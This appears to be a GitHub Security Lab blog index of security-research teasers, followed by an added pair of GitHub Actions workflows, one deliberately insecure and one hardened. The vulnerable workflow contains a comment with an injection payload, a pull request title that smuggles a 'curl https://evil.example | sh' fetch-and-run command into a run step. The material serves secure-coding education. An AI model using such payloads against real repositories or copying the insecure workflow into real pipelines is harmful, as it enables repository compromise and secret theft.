Resources
Open Source Community
While implementing CodeQL support for GitHub Actions workflows, we came across new patterns of insecure workflows. Learn how to identify and mitigate them.
Enable, with just a few clicks and for free, GitHub's security tools that help you write secure code, prevent secret leaks, scan your dependencies for known vulnerabilities, and keep your users safe overall.
The GitHub Security Lab audits open source projects and helps maintainers fix security vulnerabilities. For our 500th CVE, we took a trip down memory lane with a review of some noteworthy CVEs!
The GitHub Security Lab provided office hours for open source projects looking to improve their security posture. Here’s what we learned and how you can also participate.
Do you worry that a CVE will hurt the reputation of your project? In reality, CVEs are tracking numbers for security vulnerabilities, and nothing more. Here's how we think of them at GitHub.
Vulnerability reporters play an important role in open source security. Read our recommended process and suggestions for vulnerability disclosure to foster a positive experience.
In this series about hardening the security of the Exiv2 project, we'll share tips that will help you harden the security of your own project.
By referencing an external action with the uses directive, you're running third-party code and giving it access to computing time, any secrets the workflow exposes, and your repository token (GITHUB_TOKEN). Pinning the action to a full commit SHA, rather than a mutable tag or branch, limits what a compromised upstream can change.
Every GitHub Actions workflow trigger comes with a GitHub context. Some of this data (pull request titles, branch names, commit messages, issue bodies) may be attacker controlled and should be treated as untrusted input, especially when it is interpolated into a run step.
Combining the pull_request_target workflow trigger, which runs with a write-capable token and access to repository secrets, with an explicit checkout of an untrusted pull request is a dangerous practice that may lead to repository compromise.
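The following two workflows are an added illustration of the three points above, not code from the page or from GitHub Security Lab. The repository, the third-party action name (some-org/lint-action) and the npm test script are hypothetical, and the commit SHA placeholders must be replaced with the real 40-character SHAs of the releases you audited. The first workflow shows the insecure combination; the second is the same job with each issue addressed.

```yaml
# VULNERABLE: three insecure patterns in one workflow (constructed example)
name: pr-check
on: pull_request_target          # runs in the base repo with a write token and secrets
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # checks out attacker-controlled code while secrets are available
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: some-org/lint-action@main   # hypothetical; mutable ref, third-party code
      # the title is interpolated into the script BEFORE the shell runs it:
      # a title such as  a"; curl https://evil.example | sh; echo "  executes
      - run: echo "Checking PR: ${{ github.event.pull_request.title }}"
      - run: npm install && npm test      # package.json scripts come from the PR
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
---
# HARDENED: same job with each issue addressed (constructed example)
name: pr-check
on: pull_request                  # fork PRs get a read-only token and no secrets
permissions:
  contents: read                  # least privilege for GITHUB_TOKEN
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      # pin to an immutable commit; the placeholder below is NOT a real SHA
      - uses: actions/checkout@COMMIT_SHA_PLACEHOLDER   # e.g. 40-char SHA of the v4 tag you reviewed
      - uses: some-org/lint-action@COMMIT_SHA_PLACEHOLDER  # hypothetical action, pinned the same way
      - name: Print PR title safely
        env:
          # the value is placed in the environment; the shell expands $PR_TITLE as data
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Checking PR: $PR_TITLE"
      - run: npm ci && npm test       # untrusted scripts run with no secrets and a read-only token
```

If the job genuinely needs write access (for example to add a label), keep pull_request_target but do not check out the PR head in that job; split the untrusted build into a separate pull_request workflow and pass results through artifacts rather than running the PR's code where secrets are available.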
An overview of 2021's most common types of software vulnerabilities, based on an analysis of GitHub's Advisory Database.
A run-through of, and lessons learned from, our second episode of LiveQL, where we live-coded CodeQL queries to find a Rhino/Nashorn script injection.
Man Yue Mo built and open sourced a fuzzer for the Android Near Field Communication (NFC) component. Here he shares some design considerations that went into building the fuzzer.
Man Yue Mo goes through a series of use-after-free (UAF) vulnerabilities in Web Audio in Chrome and explains how to trigger them by arranging the order of various events.
When his prank was thwarted by COVID-19, Kevin Backhouse decided to write a glibc heap exploitation tutorial instead. Learners, you're in luck: enter the House of Force!
Antonio Morales continues his journey into socket-based fuzzing with FreeRDP, sharing his process from start to finish and the 12 bugs found as a result. Let's fuzz!
Antonio shares findings and tips from his research on socket-based fuzzing. Let's start with the audit of three widely used FTP servers, with details on interesting CVEs found along the way.
Read our beginner's exploration of encryption, focused on identity validation issues in TLS. Using CodeQL, we uncover common pitfalls in hostname validation across various projects.
When Kevin Backhouse became a contributor to the Exiv2 project, he discovered, from the other side, the burden of never-ending fuzzing reports. How to escape from the fuzzing police?
Let's dive into advanced fuzzing concepts: sanitizers, feedback-guided fuzzing, structure-aware fuzzing, custom mutators, and uncovering logical bugs with fuzzing.
Based on our security audit of VLC Media Player, we share some common fuzzing challenges, and practical ways to address them. Read on to discover a variety of fuzzing strategies.
Let's build on each other's work. By analyzing past Chromium IPC vulnerabilities, Man Yue Mo found 6 new CVEs, and gave back to the community with a set of CodeQL libraries for Chromium.
Large and unknown codebases can be daunting to approach. Read our experience with Rsyslog, leveraging CodeQL from threat modeling to variant analysis, to disclose three CVEs.
Work smarter! In this research, we explore a vulnerability in the Linux kernel and, with CodeQL's variant analysis, find two more that can be triggered remotely over Wi-Fi.
We analyzed past Android deserialization vulnerabilities and used our static analysis engine, CodeQL, to find, with just one query, the classes responsible for those bugs.